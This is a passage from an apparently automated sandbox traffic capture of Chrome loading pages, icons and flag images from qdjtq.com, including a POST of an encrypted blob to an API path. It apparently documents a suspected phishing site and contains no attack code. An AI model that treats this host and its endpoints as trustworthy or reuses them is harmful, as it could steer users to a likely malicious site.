            2024-09-27 00:29:48 UTC2075INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 33 70 78 22 20 68 65 69 67 68 74 3d 22 32 33 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 33 20 32 33 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 20 20 3c 64 65 66 73 3e 0d 0a 20 20 20 20 3c 66 69 6c 74 65 72 20 69 64 3d 22 66 69 6c 74 65 72 5f 31 22 3e 0d 0a 20 20 20 20 20 20 3c 66 65 43 6f 6c 6f 72 4d 61 74 72 69 78 20 69 6e 3d 22 53 6f 75 72 63 65
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><svg width="23px" height="23px" viewBox="0 0 23 23" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg"> <defs> <filter id="filter_1"> <feColorMatrix in="Source


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            61192.168.2.649784129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:48 UTC611OUTPOST /api/MC40NTI5MDY4NzM1NDgwODk3 HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            Content-Length: 316
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-platform: "Windows"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Content-Type: text/encrypt
            Accept: */*
            Origin: https://qdjtq.com
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:48 UTC316OUTData Raw: 55 32 46 73 64 47 56 6b 58 31 2f 4e 30 68 43 6e 6e 71 71 78 72 4d 57 47 6b 39 61 71 50 74 50 78 67 43 73 62 58 42 31 64 64 73 37 61 70 65 7a 50 76 34 74 52 79 75 62 5a 6b 31 76 50 61 57 39 52 6f 55 4b 44 31 75 36 46 6f 77 42 6e 61 6e 56 75 6c 78 2b 4e 49 52 35 54 57 77 44 31 52 75 59 49 6c 70 72 74 36 38 52 70 54 78 41 74 5a 57 63 54 5a 52 69 72 31 35 79 56 38 47 61 42 73 4b 47 41 76 38 32 34 47 49 49 79 49 71 74 4e 41 56 41 41 72 42 35 39 5a 45 39 6f 67 4a 33 6e 31 69 4b 57 4e 5a 6b 32 65 73 72 68 4d 6c 72 69 46 6b 71 5a 6f 6e 31 44 45 4b 39 62 42 45 76 6b 49 31 55 66 62 35 65 7a 48 56 61 77 38 35 71 30 70 5a 68 41 49 50 78 41 61 30 2f 4b 63 4e 6c 74 77 75 66 55 76 54 39 62 41 2f 65 61 67 32 34 66 35 49 74 4d 33 52 35 4d 37 4b 75 34 4f 65 7a 79 41 59 38
            Data Ascii: U2FsdGVkX1/N0hCnnqqxrMWGk9aqPtPxgCsbXB1dds7apezPv4tRyubZk1vPaW9RoUKD1u6FowBnanVulx+NIR5TWwD1RuYIlprt68RpTxAtZWcTZRir15yV8GaBsKGAv824GIIyIqtNAVAArB59ZE9ogJ3n1iKWNZk2esrhMlriFkqZon1DEK9bBEvkI1Ufb5ezHVaw85q0pZhAIPxAa0/KcNltwufUvT9bA/eag24f5ItM3R5M7Ku4OezyAY8
            2024-09-27 00:29:48 UTC238INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:48 GMT
            Content-Type: application/json; charset=utf-8
            Content-Length: 36
            Connection: close
            Access-Control-Allow-Origin: *
            ETag: W/"24-4kodcdMB1s1b3PMiLHpzFgz7/tw"
            2024-09-27 00:29:48 UTC36INData Raw: 55 32 46 73 64 47 56 6b 58 31 39 2b 57 6b 77 32 4d 33 51 54 38 35 53 74 4e 6c 42 55 37 4d 37 6c 65 35 4d 3d
            Data Ascii: U2FsdGVkX19+Wkw2M3QT85StNlBU7M7le5M=


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            62192.168.2.649787129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:48 UTC360OUTGET /modify/layout/images/65.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:48 UTC313INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:48 GMT
            Content-Type: image/svg+xml
            Content-Length: 3857
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"f11-1902494f420"
            2024-09-27 00:29:48 UTC3857INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 33 70 78 22 20 68 65 69 67 68 74 3d 22 32 33 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 33 20 32 33 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 20 20 3c 64 65 66 73 3e 0d 0a 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 78 31 3d 22 30 2e 37 37 37 33 36 34 22 20 79 31 3d 22 30 2e 30 38 36 35 35 34 35 36 35 22 20 78 32 3d 22 30 2e 30 37
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><svg width="23px" height="23px" viewBox="0 0 23 23" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg"> <defs> <linearGradient x1="0.777364" y1="0.086554565" x2="0.07


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            63192.168.2.649786129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:48 UTC360OUTGET /modify/layout/images/69.png HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:48 UTC310INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:48 GMT
            Content-Type: image/png
            Content-Length: 6858
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"1aca-1902494f420"
            2024-09-27 00:29:48 UTC6858INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c0 00 00 00 4e 08 06 00 00 00 76 66 19 af 00 00 00 04 73 42 49 54 08 08 08 08 7c 08 64 88 00 00 1a 81 49 44 41 54 78 9c ed 9d 59 73 da 58 da c7 ff 5a 10 62 17 8b 31 8b 6d 6c f0 12 27 76 9c a4 bb b3 cc d2 35 5d 33 17 73 35 9f 69 3e cf 5c cf 7d 2f 53 9d 9a 49 d2 49 ba 4d 62 bc e0 d8 2c 36 8b 31 66 15 48 08 bd 17 79 cf 69 30 60 e3 38 5b 37 fa 55 a5 aa 1b 8c f4 48 3a cf 39 e7 59 c5 e8 ba ae c3 c0 60 42 61 3f b5 00 06 06 9f 12 43 01 0c 26 1a 43 01 0c 26 1a 43 01 0c 26 1a 43 01 0c 26 1a 43 01 0c 26 1a 43 01 0c 26 1a 43 01 0c 26 1a 43 01 0c 26 1a 43 01 0c 26 1a fe 63 9d a8 d9 6c e2 f4 f4 14 b5 5a 0d 8a a2 40 d3 34 a8 aa 0a 00 e0 38 0e 3c cf c3 64 32 c1 66 b3 c1 e3 f1 c0 e9 74 7e 2c d1 0c 26 18 e6 43 e5 02
            Data Ascii: PNGIHDRNvfsBIT|dIDATxYsXZb1ml'v5]3s5i>\}/SIIMb,61fHyi0`8[7UH:9Y`Ba?C&C&C&C&C&C&C&C&C&clZ@48<d2ft~,&C


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            64192.168.2.649785129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:48 UTC662OUTPOST /socket.io/?EIO=4&transport=polling&t=P8mua5G&sid=cjtByYZSYtIZzkm5AHts HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            Content-Length: 1
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Accept: */*
            Content-type: text/plain;charset=UTF-8
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Origin: https://qdjtq.com
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:48 UTC1OUTData Raw: 31
            Data Ascii: 1
            2024-09-27 00:29:48 UTC198INHTTP/1.1 400 Bad Request
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:48 GMT
            Content-Type: application/json
            Transfer-Encoding: chunked
            Connection: close
            Access-Control-Allow-Origin: *
            2024-09-27 00:29:48 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
            Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            65192.168.2.649789129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:49 UTC597OUTGET /modify/layout/images/47.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:49 UTC312INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:49 GMT
            Content-Type: image/svg+xml
            Content-Length: 723
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"2d3-1902494f420"
            2024-09-27 00:29:49 UTC723INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 33 70 78 22 20 68 65 69 67 68 74 3d 22 31 35 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 33 20 31 35 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 20 20 3c 67 20 69 64 3d 22 63 6f 6c 6f 6d 62 69 61 2d 28 32 29 22 3e 0d 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 30 20 32 2e 30 33 35 33 35 43 30 20 32 2e 39 38 32 33 31 20 30 2e 37 37 31 31 37 34 20 33
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><svg width="23px" height="15px" viewBox="0 0 23 15" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg"> <g id="colombia-(2)"> <path d="M0 2.03535C0 2.98231 0.771174 3


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            66192.168.2.649788129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:49 UTC597OUTGET /modify/layout/images/48.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:49 UTC315INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:49 GMT
            Content-Type: image/svg+xml
            Content-Length: 13939
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"3673-1902494f420"
            2024-09-27 00:29:49 UTC13939INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 33 70 78 22 20 68 65 69 67 68 74 3d 22 31 36 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 33 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 20 20 3c 67 20 69 64 3d 22 65 63 75 61 64 6f 72 22 3e 0d 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 30 20 32 2e 30 34 31 39 38 43 30 20 32 2e 39 39 32 30 32 20 30 2e 37 37 31 31 37 34 20 33 2e 37 36 32 32
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><svg width="23px" height="16px" viewBox="0 0 23 16" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg"> <g id="ecuador"> <path d="M0 2.04198C0 2.99202 0.771174 3.7622


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            67192.168.2.649791129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:49 UTC360OUTGET /modify/layout/images/66.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:49 UTC313INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:49 GMT
            Content-Type: image/svg+xml
            Content-Length: 1536
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"600-1902494f420"
            2024-09-27 00:29:49 UTC1536INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 76 69 65 77 42 6f 78 3d 22 30 2c 30 2c 32 35 36 2c 32 35 36 22 20 77 69 64 74 68 3d 22 32 33 70 78 22 20 68 65 69 67 68 74 3d 22 32 33 70 78 22 3e 3c 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 6e 6f 6e 7a 65 72 6f 22 20 73 74 72 6f 6b 65 3d 22 23 32 36 32 30 32 38 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 32 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 62 75 74 74 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 6d 69 74 65 72 22 20 73 74 72 6f 6b 65 2d
            Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0,0,256,256" width="23px" height="23px"><g fill="none" fill-rule="nonzero" stroke="#262028" stroke-width="32" stroke-linecap="butt" stroke-linejoin="miter" stroke-


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            68192.168.2.649790129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:49 UTC360OUTGET /modify/layout/images/67.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:49 UTC313INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:49 GMT
            Content-Type: image/svg+xml
            Content-Length: 1450
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"5aa-1902494f420"
            2024-09-27 00:29:49 UTC1450INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 33 70 78 22 20 68 65 69 67 68 74 3d 22 32 33 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 33 20 32 33 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 20 20 3c 67 20 69 64 3d 22 47 72 6f 75 70 2d 32 33 22 3e 0d 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 31 2e 35 20 32 33 43 31 37 2e 38 35 31 33 20 32 33 20 32 33 20 31 37 2e 38 35 31 33 20 32 33 20 31
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><svg width="23px" height="23px" viewBox="0 0 23 23" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg"> <g id="Group-23"> <path d="M11.5 23C17.8513 23 23 17.8513 23 1


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            69192.168.2.649792129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:49 UTC360OUTGET /modify/layout/images/68.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:50 UTC313INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:50 GMT
            Content-Type: image/svg+xml
            Content-Length: 1101
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"44d-1902494f420"
            2024-09-27 00:29:50 UTC1101INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 33 70 78 22 20 68 65 69 67 68 74 3d 22 32 33 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 33 20 32 33 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 20 20 3c 67 20 69 64 3d 22 6c 69 6e 6b 65 64 69 6e 22 3e 0d 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 31 2e 35 20 30 43 31 37 2e 38 35 31 36 20 30 20 32 33 20 35 2e 31 34 39 31 32 20 32 33 20 31 31 2e
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><svg width="23px" height="23px" viewBox="0 0 23 23" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg"> <g id="linkedin"> <path d="M11.5 0C17.8516 0 23 5.14912 23 11.


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            70192.168.2.649794129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:49 UTC597OUTGET /modify/layout/images/49.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:50 UTC312INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:50 GMT
            Content-Type: image/svg+xml
            Content-Length: 794
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"31a-1902494f420"
            2024-09-27 00:29:50 UTC794INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 33 70 78 22 20 68 65 69 67 68 74 3d 22 31 36 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 33 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 20 20 3c 67 20 69 64 3d 22 70 65 72 75 22 3e 0d 0a 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 2e 37 32 32 35 33 20 30 43 30 2e 37 37 31 31 37 34 20 30 20 30 20 30 2e 37 37 33 31 35 20 30 20 31 2e 37 32 36
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><svg width="23px" height="16px" viewBox="0 0 23 16" version="1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg"> <g id="peru"> <path d="M1.72253 0C0.771174 0 0 0.77315 0 1.726


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            71192.168.2.649793129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:49 UTC597OUTGET /modify/layout/images/50.svg HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: image
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:50 UTC315INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:50 GMT
            Content-Type: image/svg+xml
            Content-Length: 25821
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"64dd-1902494f420"
